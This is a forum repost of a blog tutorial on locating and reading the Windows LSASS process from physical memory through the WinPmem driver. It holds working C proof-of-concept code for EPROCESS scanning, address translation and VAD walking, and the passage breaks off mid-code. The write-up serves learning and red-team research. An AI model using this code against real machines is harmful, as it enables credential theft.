Everything posted by Nytro

  1. A physical graffiti of LSASS: getting credentials from physical memory for fun and learning
May 08, 2021 - Adepts of 0xCC

Dear Fellowlship, today's homily is about how one of our owls began his own quest through the lands of physical memory to find the credential keys to paradise. Please, take a seat and listen to the story.

Prayers at the foot of the Altar a.k.a. disclaimer

Our knowledge about the topic discussed in this article is limited; as we stated in the title, we did this work just for learning purposes. If you spot inaccuracies/misconceptions, please ping us on Twitter so we can fix them. For more accurate information (and deeper explanations), please check the book "Windows Internals" (Pavel Yosifovich, Alex Ionescu, Mark E. Russinovich & David A. Solomon). Well-known forensic tools (for example Volatility) are also a good source of information. Another important thing to keep in mind: the Windows version used here is Windows 10 2009 20H2 (October 2020 Update).

Preamble

Hunting for juicy information inside dumps of physical memory is something that regular forensic tools do by default. Even cheaters have explored this path in the past to build wallhacks: read physical memory, find your desired game process and look for the player information structs. From a Red Teaming/Pentesting perspective, this approach has also been explored in order to obtain credentials from the lsass process on live machines during engagements. For example, in 2020 F-Secure published an article titled "Rethinking credential theft" and released a tool called "PhysMem2Profit". In their article/tool they use the WinPmem driver to read physical memory (a vulnerable driver with a read primitive would work too), creating a bridge with sockets between the target machine and the pentester machine, so they can create a minidump of the lsass process that is compatible with Mimikatz, with the help of Rekall.

Working schema (from 'Rethinking Credential Theft')

The steps they follow are:
- Expose the physical memory of the target over a TCP port.
- Connect to the TCP port and mount the physical memory as a file.
- Analyze the mounted memory with the help of the Rekall framework and create a minidump of LSASS.
- Run the minidump through Mimikatz and retrieve credential material.

In our humble opinion, this approach is too convoluted and contains unnecessary steps. Also, creating a socket between the two machines does not look fine to us. So… here comes our idea: let's try to loot lsass from physical memory while staying on the same machine and WITHOUT external tools (like they did with Rekall). It is a good opportunity to learn new things!

It's dangerous to go alone! Take this.

As in any quest, we first need a map and a compass to find the treasure, because the land of physical memory is dangerous and full of terrors. We can read arbitrary physical memory with WinPmem or a vulnerable driver with a read primitive, but… how can we find the process memory? Well, our map is the AVL tree that contains the VAD info and our compass is the EPROCESS struct. Let's explain this!

The Memory Manager needs to keep track of which virtual addresses have been reserved in the process' address space. This information is contained in structs called "VAD" (Virtual Address Descriptor) and they are placed inside an AVL tree (an AVL tree is a self-balancing binary search tree).
The tree is our map: if we find the first tree’s node we can start to walk it and retrieve all the VADs, and consequently we would get the knowledge of how the process memory is distributed (also, the VAD provides more useful information as we are going to see later). But… how can we find this tree? Well, we need the compass. And our compass is the EPROCESS. This structure contains a pointer to the tree (field VadRoot) and the number of nodes (VadCount😞 //0xa40 bytes (sizeof) struct _EPROCESS { struct _KPROCESS Pcb; //0x0 struct _EX_PUSH_LOCK ProcessLock; //0x438 VOID* UniqueProcessId; //0x440 struct _LIST_ENTRY ActiveProcessLinks; //0x448 struct _EX_RUNDOWN_REF RundownProtect; //0x458 //(...) struct _RTL_AVL_TREE VadRoot; //0x7d8 VOID* VadHint; //0x7e0 ULONGLONG VadCount; //0x7e8 //(...) Finding this structure in physical memory is easy. In the article “CVE-2019-8372: Local Privilege Elevation in LG Kernel Driver”, @Jackson_T uses a mask to find this structure. As we know some data (like the PID, the process name or the Priority value) we can use this as a signature and search the whole physical memory until we match it. We’ll know the name and PID for each process we’re targeting, so the UniqueProcessId and ImageFileName fields should be good candidates. Problem is that we won’t be able to accurately predict the values for every field between them. Instead, we can define two needles: one that has ImageFileName and another that has UniqueProcessId. We can see that their corresponding byte buffers have predictable outputs. (From Jackson_T post) So, we can search for our masks and then apply relative offsets to read the fields that we are interested in: int main(int argc, char** argv) { WINPMEM_MEMORY_INFO info; DWORD size; BOOL result = FALSE; int i = 0; LARGE_INTEGER large_start; DWORD found = 0; printf("[+] Getting WinPmem handle...\t"); pmem_fd = CreateFileA("\\\\.\\pmem", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (pmem_fd == INVALID_HANDLE_VALUE) { printf("ERROR!\n"); return -1; } printf("OK!\n"); RtlZeroMemory(&info, sizeof(WINPMEM_MEMORY_INFO)); printf("[+] Getting memory info...\t"); result = DeviceIoControl(pmem_fd, IOCTL_GET_INFO, NULL, 0, // in (char*)&info, sizeof(WINPMEM_MEMORY_INFO), // out &size, NULL); if (!result) { printf("ERROR!\n"); return -1; } printf("OK!\n"); printf("[+] Memory Info:\n"); printf("\t[-] Total ranges: %lld\n", info.NumberOfRuns.QuadPart); for (i = 0; i < info.NumberOfRuns.QuadPart; i++) { printf("\t\tStart 0x%08llX - Length 0x%08llx\n", info.Run[i].BaseAddress.QuadPart, info.Run[i].NumberOfBytes.QuadPart); max_physical_memory = info.Run[i].BaseAddress.QuadPart + info.Run[i].NumberOfBytes.QuadPart; } printf("\t[-] Max physical memory 0x%08llx\n", max_physical_memory); printf("[+] Scanning memory... "); for (i = 0; i < info.NumberOfRuns.QuadPart; i++) { start = info.Run[i].BaseAddress.QuadPart; end = info.Run[i].BaseAddress.QuadPart + info.Run[i].NumberOfBytes.QuadPart; while (start < end) { unsigned char* largebuffer = (unsigned char*)malloc(BUFF_SIZE); DWORD to_write = (DWORD)min((BUFF_SIZE), end - start); DWORD bytes_read = 0; DWORD bytes_written = 0; large_start.QuadPart = start; result = SetFilePointerEx(pmem_fd, large_start, NULL, FILE_BEGIN); if (!result) { printf("[!] ERROR! 
(SetFilePointerEx)\n"); } result = ReadFile(pmem_fd, largebuffer, to_write, &bytes_read, NULL); EPROCESS_NEEDLE needle_root_process = {"lsass.exe"}; PBYTE needle_buffer = (PBYTE)malloc(sizeof(EPROCESS_NEEDLE)); memcpy(needle_buffer, &needle_root_process, sizeof(EPROCESS_NEEDLE)); int offset = 0; offset = memmem((PBYTE)largebuffer, bytes_read, needle_buffer, sizeof(EPROCESS_NEEDLE)); // memmem() is the same used by Jackson_T in his post if (offset >= 0) { if (largebuffer[offset + 15] == 2) { //Priority Check if (largebuffer[offset - 0x168] == 0x70 && largebuffer[offset - 0x167] == 0x02) { //PID check, hardcoded for PoC, we can take in runtime but... too lazy :P printf("signature match at 0x%08llx!\n", offset + start); printf("[+] EPROCESS is at 0x%08llx [PHYSICAL]\n", offset - 0x5a8 + start); memcpy(&DirectoryTableBase, largebuffer + offset - 0x5a8 + 0x28, sizeof(ULONGLONG)); printf("\t[*] DirectoryTableBase: 0x%08llx\n", DirectoryTableBase); printf("\t[*] VadRoot is at 0x%08llx [PHYSICAL]\n", start + offset - 0x5a8 + 0x7d8); memcpy(&VadRootPointer, largebuffer + offset - 0x5a8 + 0x7d8, sizeof(ULONGLONG)); VadRootPointer = VadRootPointer; printf("\t[*] VadRoot points to 0x%08llx [VIRTUAL]\n", VadRootPointer); memcpy(&VadCount, largebuffer + offset - 0x5a8 + 0x7e8, sizeof(ULONGLONG)); printf("\t[*] VadCount is %lld\n", VadCount); free(needle_buffer); free(largebuffer); found = 1; break; } } } start += bytes_read; free(needle_buffer); free(largebuffer); } if (found != 0) { break; } } return 0; } And here is the ouput: [+] Getting WinPmem handle... OK! [+] Getting memory info... OK! [+] Memory Info: [-] Total ranges: 4 Start 0x00001000 - Length 0x0009e000 Start 0x00100000 - Length 0x00002000 Start 0x00103000 - Length 0xdfeed000 Start 0x100000000 - Length 0x20000000 [-] Max physical memory 0x120000000 [+] Scanning memory... signature match at 0x271c3628! [+] EPROCESS is at 0x271c3080 [PHYSICAL] [*] DirectoryTableBase: 0x29556000 [*] VadRoot is at 0x271c3858 [PHYSICAL] [*] VadRoot points to 0xffffa48bb0147290 [VIRTUAL] [*] VadCount is 165 Maybe you are wondering why are we interested in the field DirectoryTableBase. The thing is: from our point of view we only can work with physical memory, we do not “understand” what a virtual address is because to us they are “out of context”. We know about physical memory and offsets, not about virtual addresses bounded to a process. But we are going to deal with pointers to virtual memory so… we need a way to translate them. Lost in translation I like to compare virtual addresses with the code used in libraries to know the location of a book, where the first digits indicates the hall, the next the bookshelf, the column and finally the shelf where the book lies. Our virtual address is in some way just like the library code: it contains different indexes. Instead of talking about halls, columns or shelves, we have Page-Map-Level4 (PML4E), Page-Directory-Pointer (PDPE), Page-Directory (PDE), Page-Table (PTE) and the Page Physical Offset. From AMD64 Architecture Programmer’s Manual Volume 2. Those are the page levels for a 4KB page, for 2MB we have PML4E, PDPE, PDE and the offset. 
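
To make the index arithmetic concrete, here is a small standalone sketch (ours, not from the original article) that splits the same example address into its table indexes; it mirrors what the v2p() helper shown later does via its extractBits() calls:

#include <stdio.h>
#include <stdint.h>

int main(void)
{
    uint64_t va = 0xffffa48bb0147290ULL;           // example address used in the article

    uint64_t pml4_index = (va >> 39) & 0x1ff;      // 9 bits -> index into the PML4 (base = DirectoryTableBase)
    uint64_t pdpt_index = (va >> 30) & 0x1ff;      // 9 bits -> index into the PDPT
    uint64_t pd_index   = (va >> 21) & 0x1ff;      // 9 bits -> index into the PD
    uint64_t pt_index   = (va >> 12) & 0x1ff;      // 9 bits -> index into the PT
    uint64_t page_off   = va & 0xfff;              // final 12 bits -> offset inside the 4KB page

    // Each index is multiplied by 8 (size of a table entry) and added to the table's physical base,
    // e.g. PML4E = DirectoryTableBase + pml4_index * 8 -> 0x29556000 + 0x149 * 8 = 0x29556a48
    printf("PML4:%llx PDPT:%llx PD:%llx PT:%llx offset:%llx\n",
           (unsigned long long)pml4_index, (unsigned long long)pdpt_index,
           (unsigned long long)pd_index, (unsigned long long)pt_index,
           (unsigned long long)page_off);
    return 0;
}
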
We can verify this information using kd and the command !vtop with different processes: For 4KB (Base 0x26631000, virtual adress to translate 0xffffc987034fd330): lkd> !vtop 26631000 0xffffc987034fd330 Amd64VtoP: Virt ffffc987034fd330, pagedir 0000000026631000 Amd64VtoP: PML4E 0000000026631c98 Amd64VtoP: PDPE 00000000046320e0 Amd64VtoP: PDE 0000000100a1c0d0 Amd64VtoP: PTE 000000001fa3f7e8 Amd64VtoP: Mapped phys 0000000026da8330 Virtual address ffffc987034fd330 translates to physical address 26da8330. For 2MB (Base 0x1998D000, virtual address to translate 0xffffaa83f4b35640): lkd> !vtop 1998D000 ffffaa83f4b35640 Amd64VtoP: Virt ffffaa83f4b35640, pagedir 000000001998d000 Amd64VtoP: PML4E 000000001998daa8 Amd64VtoP: PDPE 0000000004631078 Amd64VtoP: PDE 0000000004734d28 Amd64VtoP: Large page mapped phys 0000000108d35640 Virtual address ffffaa83f4b35640 translates to physical address 108d35640. What is it doing under the hood? Well, the picture of a 4KB page follows this explanation: if you turn the virtual address to its binary representation, you can split it into the indexes of each page level. So, imagine we want to translate the virtual address 0xffffa48bb0147290 and the process page base is 0x29556000 (let’s assume is a 4kb page, later we will explain how to know it). lkd> .formats ffffa48bb0147290 Evaluate expression: Hex: ffffa48b`b0147290 Decimal: -100555115171184 Octal: 1777775110566005071220 Binary: 11111111 11111111 10100100 10001011 10110000 00010100 01110010 10010000 Chars: ......r. Time: ***** Invalid FILETIME Float: low -5.40049e-010 high -1.#QNAN Double: -1.#QNAN Now we can split the bits in chunks: 12 bits for the Page Physical Offset, 9 for the PTE, 9 for the PDE, 9 for the PDPE and 9 for the PML4E: 1111111111111111 101001001 000101110 110000000 101000111 001010010000 Next we are going to take the chunk for PML4E and multiply by 0x8: lkd> .formats 0y101001001 Evaluate expression: Hex: 00000000`00000149 Decimal: 329 Octal: 0000000000000000000511 Binary: 00000000 00000000 00000000 00000000 00000000 00000000 00000001 01001001 Chars: .......I Time: Thu Jan 1 01:05:29 1970 Float: low 4.61027e-043 high 0 Double: 1.62548e-321 0x149 * 0x8 = 0xa48 Now we can use it as an offset: just add this value to the page base (0x29556a48). Next, read the physical memory at that location: lkd> !dq 29556a48 #29556a48 0a000000`04632863 00000000`00000000 #29556a58 00000000`00000000 00000000`00000000 #29556a68 00000000`00000000 00000000`00000000 #29556a78 00000000`00000000 00000000`00000000 #29556a88 00000000`00000000 00000000`00000000 #29556a98 00000000`00000000 00000000`00000000 #29556aa8 00000000`00000000 00000000`00000000 #29556ab8 00000000`00000000 00000000`00000000 Turn to zero the last 3 numbers, so we have 0x4632000. Now repeat the operation of multiplying the chunk of bits: kd> .formats 0y000101110 Evaluate expression: Hex: 00000000`0000002e Decimal: 46 Octal: 0000000000000000000056 Binary: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00101110 Chars: ........ Time: Thu Jan 1 01:00:46 1970 Float: low 6.44597e-044 high 0 Double: 2.2727e-322 So… 0x4632000 + (0x2e * 0x8) == 0x4632170. 
Read the physical memory at this point: lkd> !dq 4632170 # 4632170 0a000000`04735863 00000000`00000000 # 4632180 00000000`00000000 00000000`00000000 # 4632190 00000000`00000000 00000000`00000000 # 46321a0 00000000`00000000 00000000`00000000 # 46321b0 00000000`00000000 00000000`00000000 # 46321c0 00000000`00000000 00000000`00000000 # 46321d0 00000000`00000000 00000000`00000000 # 46321e0 00000000`00000000 00000000`00000000 Just repeat the same operation until the end (except for the last 12 bits, those no need to by multiplied by 0x8) and you have translated successfully your virtual address! Don’t trust me? Check it! kd> !vtop 0x29556000 0xffffa48bb0147290 Amd64VtoP: Virt ffffa48bb0147290, pagedir 0000000029556000 Amd64VtoP: PML4E 0000000029556a48 Amd64VtoP: PDPE 0000000004632170 Amd64VtoP: PDE 0000000004735c00 Amd64VtoP: PTE 0000000022246a38 Amd64VtoP: Mapped phys 000000001645b290 Virtual address ffffa48bb0147290 translates to physical address 1645b290. Ta-dá! Here is a sample function that we are going to use to translate virtual addresses (4Kb and 2Mb) to physical (ugly as hell, but works): ULONGLONG v2p(ULONGLONG vaddr) { BOOL result = FALSE; DWORD bytes_read = 0; LARGE_INTEGER PML4E; LARGE_INTEGER PDPE; LARGE_INTEGER PDE; LARGE_INTEGER PTE; ULONGLONG SIZE = 0; ULONGLONG phyaddr = 0; ULONGLONG base = 0; base = DirectoryTableBase; PML4E.QuadPart = base + extractBits(vaddr, 9, 39) * 0x8; //printf("[DEBUG Virtual Address: 0x%08llx]\n", vaddr); //printf("\t[*] PML4E: 0x%x\n", PML4E.QuadPart); result = SetFilePointerEx(pmem_fd, PML4E, NULL, FILE_BEGIN); PDPE.QuadPart = 0; result = ReadFile(pmem_fd, &PDPE.QuadPart, 7, &bytes_read, NULL); PDPE.QuadPart = extractBits(PDPE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 30) * 0x8; //printf("\t[*] PDPE: 0x%08llx\n", PDPE.QuadPart); result = SetFilePointerEx(pmem_fd, PDPE, NULL, FILE_BEGIN); PDE.QuadPart = 0; result = ReadFile(pmem_fd, &PDE.QuadPart, 7, &bytes_read, NULL); PDE.QuadPart = extractBits(PDE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 21) * 0x8; //printf("\t[*] PDE: 0x%08llx\n", PDE.QuadPart); result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN); PTE.QuadPart = 0; result = ReadFile(pmem_fd, &SIZE, 8, &bytes_read, NULL); if (extractBits(SIZE, 1, 63) == 1) { result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &phyaddr, 7, &bytes_read, NULL); phyaddr = extractBits(phyaddr, 56, 20) * 0x100000 + extractBits(vaddr, 21, 0); //printf("\t[*] Physical Address: 0x%08llx\n", phyaddr); return phyaddr; } result = SetFilePointerEx(pmem_fd, PDE, NULL, FILE_BEGIN); PTE.QuadPart = 0; result = ReadFile(pmem_fd, &PTE.QuadPart, 7, &bytes_read, NULL); PTE.QuadPart = extractBits(PTE.QuadPart, 56, 12) * 0x1000 + extractBits(vaddr, 9, 12) * 0x8; //printf("\t[*] PTE: 0x%08llx\n", PTE.QuadPart); result = SetFilePointerEx(pmem_fd, PTE, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &phyaddr, 7, &bytes_read, NULL); phyaddr = extractBits(phyaddr, 56, 12) * 0x1000 + extractBits(vaddr, 12, 0); //printf("\t[*] Physical Address: 0x%08llx\n", phyaddr); return phyaddr; } Well, now we can work with virtual addresses. Let’s move! Lovin’ Don’t Grow On Trees The next task to solve is to walk the AVL tree and extract all the VADs. 
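
Before moving on, note that v2p() (and the tree walker below) relies on two helpers that are not included in the excerpt: extractBits() and readPhysMemPointer(). Their behaviour is inferred from the call sites, so treat the following as an assumed sketch rather than the authors' exact code; pmem_fd is the global \\.\pmem handle opened earlier:

#include <windows.h>

extern HANDLE pmem_fd;   // the \\.\pmem handle opened in main()

// Inferred from the call sites: return `count` bits of `value` starting at bit `position`.
ULONGLONG extractBits(ULONGLONG value, ULONGLONG count, ULONGLONG position)
{
    ULONGLONG mask = (count >= 64) ? ~0ULL : ((1ULL << count) - 1);
    return (value >> position) & mask;
}

// Read an 8-byte little-endian value from the given physical offset via the WinPmem device.
ULONGLONG readPhysMemPointer(LARGE_INTEGER physOffset)
{
    ULONGLONG value = 0;
    DWORD bytesRead = 0;
    if (SetFilePointerEx(pmem_fd, physOffset, NULL, FILE_BEGIN))
        ReadFile(pmem_fd, &value, sizeof(value), &bytesRead, NULL);
    return value;
}
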
Let’s check the VadRoot pointer: lkd> dq ffffa48bb0147290 ffffa48b`b0147290 ffffa48b`b0146c50 ffffa48b`b01493b0 ffffa48b`b01472a0 00000000`00000001 ff643ab1`ff643aa0 ffffa48b`b01472b0 00000000`00000707 00000000`00000000 ffffa48b`b01472c0 00000003`000003a0 00000000`00000000 ffffa48b`b01472d0 00000000`04000000 ffffa48b`b014daa0 ffffa48b`b01472e0 ffffd100`10b56f40 ffffd100`10b56fc8 ffffa48b`b01472f0 ffffa48b`b014da28 ffffa48b`b014da28 ffffa48b`b0147300 ffffa48b`b016e081 00007ff6`43aa5002 The first thing we can see is the pointer to the left node (offset 0x00-0x07) and the pointer to the right node (0x08-0x10). We have to add them to a queue and check them later, and add their respective new children nodes, repeating this operation in order to walk the whole tree. Also combining 4 bytes from 0x18 and 1 byte from 0x20 we get the starting address of the described memory region (the ending virtual addrees is obtained combining 4 bytes from 0x1c and 1 byte from 0x21). So we can walk the whole tree doing something like: //(...) currentNode = queue[cursor]; // Current Node, at start it is the VadRoot pointer if (currentNode == 0) { cursor++; continue; } reader.QuadPart = v2p(currentNode); // Get Physical Address left = readPhysMemPointer(reader); //Read 8 bytes and save it as "left" node queue[last++] = left; //Add the new node //printf("[<] Left: 0x%08llx\n", left); reader.QuadPart = v2p(currentNode + 0x8); // Get Physical Address of right node right = readPhysMemPointer(reader); //Save the pointer queue[last++] = right; //Add the new node //printf("[>] Right: 0x%08llx\n", right); // Get the start address reader.QuadPart = v2p(currentNode + 0x18); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &startingVpn, 4, &bytes_read, NULL); reader.QuadPart = v2p(currentNode + 0x20); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &startingVpnHigh, 1, &bytes_read, NULL); start = (startingVpn << 12) | (startingVpnHigh << 44); // Get the end address reader.QuadPart = v2p(currentNode + 0x1c); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &endingVpn, 4, &bytes_read, NULL); reader.QuadPart = v2p(currentNode + 0x21); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &endingVpnHigh, 1, &bytes_read, NULL); end = (((endingVpn + 1) << 12) | (endingVpnHigh << 44)); //(...) Now we can retrieve all the regions of virtual memory reserved, and the limits (starting address and ending address, and by substraction the size): [+] Starting to walk _RTL_AVL_TREE... ===================[VAD info]=================== [0] (0xffffa48bb0147290) [0x7ff643aa0000-0x7ff643ab2000] (73728 bytes) [1] (0xffffa48bb0146c50) [0x1d4d2ef0000-0x1d4d2f0d000] (118784 bytes) [2] (0xffffa48bb01493b0) [0x7ff845000000-0x7ff845027000] (159744 bytes) [3] (0xffffa48bb0179300) [0x80cbf00000-0x80cbf80000] (524288 bytes) [4] (0xffffa48bb01795d0) [0x1d4d36a0000-0x1d4d36a1000] (4096 bytes) [5] (0xffffa48bb01a1390) [0x7ff844540000-0x7ff84454c000] (49152 bytes) But VADs contains other interesting metadata. For example, if the region is reserved for a image file, we can retrieve the path of that file. This is important for us because we want to locate the loaded lsasrv.dll inside the lsass process because from here is where we are going to loot credentials (imitating the Mimikatz’s sekurlsa::msv to get NTLM hashes). 
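
For reference, the offsets read above map onto the _MMVAD_SHORT header embedded at the start of each node. This is an abridged view with only the fields the walker touches, at their Windows 10 20H2 offsets (verify on your build with dt nt!_MMVAD_SHORT / dt nt!_MMVAD):

#include <windows.h>

typedef struct _VAD_NODE_VIEW {
    ULONGLONG Left;              // +0x000 _RTL_BALANCED_NODE.Children[0]
    ULONGLONG Right;             // +0x008 _RTL_BALANCED_NODE.Children[1]
    ULONGLONG ParentValue;       // +0x010
    ULONG     StartingVpn;       // +0x018 low 32 bits of the starting virtual page number
    ULONG     EndingVpn;         // +0x01c low 32 bits of the ending virtual page number
    UCHAR     StartingVpnHigh;   // +0x020 high bits of the starting VPN
    UCHAR     EndingVpnHigh;     // +0x021 high bits of the ending VPN
    // ... rest of _MMVAD_SHORT/_MMVAD omitted (u, PushLock, Subsection at +0x48 of _MMVAD, ...)
} VAD_NODE_VIEW;

// Region limits are rebuilt from the VPN fields exactly as in the walker:
//   start = (StartingVpn << 12) | ((ULONGLONG)StartingVpnHigh << 44);
//   end   = (((ULONGLONG)EndingVpn + 1) << 12) | ((ULONGLONG)EndingVpnHigh << 44);
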
Let’s take a ride through the __mmvad struct (follow the arrows!): lkd> dt nt!_mmvad 0xffffe786`ed185cf0 +0x000 Core : _MMVAD_SHORT +0x040 u2 : <anonymous-tag> +0x048 Subsection : 0xffffe786`ed185d60 _SUBSECTION <=========== +0x050 FirstPrototypePte : (null) +0x058 LastContiguousPte : 0x00000002`00000006 _MMPTE +0x060 ViewLinks : _LIST_ENTRY [ 0x00000006`00000029 - 0x00000000`00000000 ] +0x070 VadsProcess : 0xffffe786`ed185c70 _EPROCESS +0x078 u4 : <anonymous-tag> +0x080 FileObject : 0xffffe786`ed185d98 _FILE_OBJECT kd> dt nt!_SUBSECTION 0xffffe786`ed185d60 +0x000 ControlArea : 0xffffe786`ed185c70 _CONTROL_AREA <============================== +0x008 SubsectionBase : 0xffffae0e`cab53f58 _MMPTE +0x010 NextSubsection : 0xffffe786`ed185d98 _SUBSECTION +0x018 GlobalPerSessionHead : _RTL_AVL_TREE +0x018 CreationWaitList : (null) +0x018 SessionDriverProtos : (null) +0x020 u : <anonymous-tag> +0x024 StartingSector : 0x2b +0x028 NumberOfFullSectors : 0x2c +0x02c PtesInSubsection : 6 +0x030 u1 : <anonymous-tag> +0x034 UnusedPtes : 0y000000000000000000000000000000 (0) +0x034 ExtentQueryNeeded : 0y0 +0x034 DirtyPages : 0y0 lkd> dt nt!_CONTROL_AREA 0xffffe786`ed185c70 +0x000 Segment : 0xffffae0e`ce0c9f50 _SEGMENT +0x008 ListHead : _LIST_ENTRY [ 0xffffe786`ed1b1210 - 0xffffe786`ed1b1210 ] +0x008 AweContext : 0xffffe786`ed1b1210 Void +0x018 NumberOfSectionReferences : 1 +0x020 NumberOfPfnReferences : 0xf +0x028 NumberOfMappedViews : 1 +0x030 NumberOfUserReferences : 2 +0x038 u : <anonymous-tag> +0x03c u1 : <anonymous-tag> +0x040 FilePointer : _EX_FAST_REF <================= +0x048 ControlAreaLock : 0n0 +0x04c ModifiedWriteCount : 0 +0x050 WaitList : (null) +0x058 u2 : <anonymous-tag> +0x068 FileObjectLock : _EX_PUSH_LOCK +0x070 LockedPages : 1 +0x078 u3 : <anonymous-tag> So at 0xffffe786ed185c70 plus 0x40 we have a field called FilePointer and it is an EX_FAST_REF. In order to retrieve the correct pointer, we have to retrieve the pointer from this position and turn to zero the last digit: lkd> dt nt!_EX_FAST_REF 0xffffe786`ed185c70+0x40 +0x000 Object : 0xffffe786`ed19539c Void <=========================== & 0xfffffffffffffff0 +0x000 RefCnt : 0y1100 +0x000 Value : 0xffffe786`ed19539c So 0xffffe786ed19539c & 0xfffffffffffffff0 is 0xffffe786ed195390, which is a pointer to a _FILE_OBJECT struct: lkd> dt nt!_FILE_OBJECT 0xffffe786`ed195390 +0x000 Type : 0n5 +0x002 Size : 0n216 +0x008 DeviceObject : 0xffffe786`e789c060 _DEVICE_OBJECT +0x010 Vpb : 0xffffe786`e77df4c0 _VPB +0x018 FsContext : 0xffffae0e`cd2c8170 Void +0x020 FsContext2 : 0xffffae0e`cd2c83e0 Void +0x028 SectionObjectPointer : 0xffffe786`ed18e7f8 _SECTION_OBJECT_POINTERS +0x030 PrivateCacheMap : (null) +0x038 FinalStatus : 0n0 +0x040 RelatedFileObject : (null) +0x048 LockOperation : 0 '' +0x049 DeletePending : 0 '' +0x04a ReadAccess : 0x1 '' +0x04b WriteAccess : 0 '' +0x04c DeleteAccess : 0 '' +0x04d SharedRead : 0x1 '' +0x04e SharedWrite : 0 '' +0x04f SharedDelete : 0x1 '' +0x050 Flags : 0x44042 +0x058 FileName : _UNICODE_STRING "\Windows\System32\lsass.exe" <======== /!\ +0x068 CurrentByteOffset : _LARGE_INTEGER 0x0 +0x070 Waiters : 0 +0x074 Busy : 0 +0x078 LastLock : (null) +0x080 Lock : _KEVENT +0x098 Event : _KEVENT +0x0b0 CompletionContext : (null) +0x0b8 IrpListLock : 0 +0x0c0 IrpList : _LIST_ENTRY [ 0xffffe786`ed195450 - 0xffffe786`ed195450 ] +0x0d0 FileObjectExtension : (null) Finally! At offset 0x58 is an _UNICODE_STRING struct that contains the path to the image asociated with this memory region. 
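
Since that UNICODE_STRING is going to be read field by field from physical memory, its x64 layout is worth spelling out; the +0x2 and +0x8 reads in the walker below land on MaximumLength and Buffer respectively (a sketch of the layout, with Buffer shown as a raw 64-bit value because it is a virtual address inside the target that still needs v2p()):

#include <windows.h>

typedef struct _UNICODE_STRING_VIEW {
    USHORT    Length;            // +0x0 string size in bytes (no terminating null)
    USHORT    MaximumLength;     // +0x2 buffer size in bytes (what the PoC reads as pathLen)
    ULONG     Padding;           // +0x4 alignment padding on x64
    ULONGLONG Buffer;            // +0x8 pointer to the WCHAR buffer in the target process
} UNICODE_STRING_VIEW;
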
In order to get this info, we need to parse each node found and get deep in this rollercoaster of structs, reading each pointer from the target offset. So… finally we are going to have something like: void walkAVL(ULONGLONG VadRoot, ULONGLONG VadCount) { /* Variables used to walk the AVL tree*/ ULONGLONG* queue; BOOL result; DWORD bytes_read = 0; LARGE_INTEGER reader; ULONGLONG cursor = 0; ULONGLONG count = 1; ULONGLONG last = 1; ULONGLONG startingVpn = 0; ULONGLONG endingVpn = 0; ULONGLONG startingVpnHigh = 0; ULONGLONG endingVpnHigh = 0; ULONGLONG start = 0; ULONGLONG end = 0; VAD* vadList = NULL; printf("[+] Starting to walk _RTL_AVL_TREE...\n"); queue = (ULONGLONG *)malloc(sizeof(ULONGLONG) * VadCount * 4); // Make room for our queue queue[0] = VadRoot; // Node 0 vadList = (VAD*)malloc(VadCount * sizeof(*vadList)); // Save all the VADs in an array. We do not really need it (because we can just break when the lsasrv.dll is found) but hey... maybe we want to reuse this code in the future while (count <= VadCount) { ULONGLONG currentNode; ULONGLONG left = 0; ULONGLONG right = 0; ULONGLONG subsection = 0; ULONGLONG control_area = 0; ULONGLONG filepointer = 0; ULONGLONG fileobject = 0; ULONGLONG filename = 0; USHORT pathLen = 0; LPWSTR path = NULL; // printf("Cursor [%lld]\n", cursor); currentNode = queue[cursor]; // Current Node, at start it is the VadRoot pointer if (currentNode == 0) { cursor++; continue; } reader.QuadPart = v2p(currentNode); // Get Physical Address left = readPhysMemPointer(reader); //Read 8 bytes and save it as "left" node queue[last++] = left; //Add the new node //printf("[<] Left: 0x%08llx\n", left); reader.QuadPart = v2p(currentNode + 0x8); // Get Physical Address of right node right = readPhysMemPointer(reader); //Save the pointer queue[last++] = right; //Add the new node //printf("[>] Right: 0x%08llx\n", right); // Get the start address reader.QuadPart = v2p(currentNode + 0x18); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &startingVpn, 4, &bytes_read, NULL); reader.QuadPart = v2p(currentNode + 0x20); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &startingVpnHigh, 1, &bytes_read, NULL); start = (startingVpn << 12) | (startingVpnHigh << 44); // Get the end address reader.QuadPart = v2p(currentNode + 0x1c); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &endingVpn, 4, &bytes_read, NULL); reader.QuadPart = v2p(currentNode + 0x21); result = SetFilePointerEx(pmem_fd, reader, NULL, FILE_BEGIN); result = ReadFile(pmem_fd, &endingVpnHigh, 1, &bytes_read, NULL); end = (((endingVpn + 1) << 12) | (endingVpnHigh << 44)); //Get the pointer to Subsection (offset 0x48 of __mmvad) reader.QuadPart = v2p(currentNode + 0x48); subsection = readPhysMemPointer(reader); if (subsection != 0 && subsection != 0xffffffffffffffff) { //Get the pointer to ControlArea (offset 0 of _SUBSECTION) reader.QuadPart = v2p(subsection); control_area = readPhysMemPointer(reader); if (control_area != 0 && control_area != 0xffffffffffffffff) { //Get the pointer to FileObject (offset 0x40 of _CONTROL_AREA) reader.QuadPart = v2p(control_area + 0x40); fileobject = readPhysMemPointer(reader); if (fileobject != 0 && fileobject != 0xffffffffffffffff) { // It is an _EX_FAST_REF, so we need to mask the last byte fileobject = fileobject & 0xfffffffffffffff0; //Get the pointer to path length (offset 0x58 of _FILE_OBJECT is _UNICODE_STRING, the len plus null bytes is at +0x2) 
